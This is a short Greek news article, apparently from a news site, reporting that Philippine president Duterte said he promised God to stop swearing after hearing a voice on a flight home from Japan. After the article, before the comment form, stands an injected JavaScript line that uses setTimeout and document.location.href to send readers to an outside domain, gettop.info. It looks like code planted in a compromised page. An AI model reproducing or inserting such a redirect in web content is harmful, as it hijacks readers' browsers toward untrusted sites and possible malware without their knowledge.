Ντουτέρτε: Υποσχέθηκα στον Θεό να μην ξαναβρίσω

0
7

 

Ο πρόεδρος των Φιλιππίνων γνωστός για τη σκηλρότητα, τις βωμολοχίες και τις αισχολογίες του είπε ότι δεν θα ξαναβρίσει καθώς το υποσχέθηκε στον Θεό. Μάλιστα, το δικαιολόγησε αποκαλύπτοντας κι ένα όραμα που είχε.

Ο Ντουτέρτε έδωσε την υπόσχεση κατά την άφιξή του στη γενέτειρά του, την πόλη Νταβάο στις νότιες Φιλιππίνες, από ταξίδι του στην Ιαπωνία.

Όπως είπε, βρισκόταν στο αεροπλάνο που τον μετέφερε πίσω στην πατρίδα του και κοίταζε τον ουρανό ενώ όλοι οι άλλοι είχαν αποκοιμηθεί βαθιά, μερικοί ροχαλίζοντας. Άκουσε τότε μια φωνή που του είπε, «αν δεν σταματήσεις τους χαρακτηρισμούς, θα ρίξω αυτό το αεροπλάνο».

«Κι εγώ είπα, ‘Ποιος είναι αυτός που μιλάει;’ Και φυσικά ‘είναι ο Θεός’», είπε.

«Έτσι υποσχέθηκα στον Θεό να μην ξαναπώ βωμολοχίες, βλασφημίες και τα παρόμοια. Έτσι, παιδιά, θα με ακούτε να μιλάω πάντα σωστά, επειδή μια υπόσχεση στον Θεό είναι μια υπόσχεση στον λαό των Φιλιππίνων».

Υπενθυμίζεται ότι ο Ντουτέρτε είχε αποκαλέσει τον Πάπα «σκύλας γιο» και είχε στείλει «στην κόλαση» τον Μπαράκ Ομπάμα, δήλωσε πως υποσχέθηκε στον Θεό ότι δεν θα εκστομίσει ξανά βλασφημίες.

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here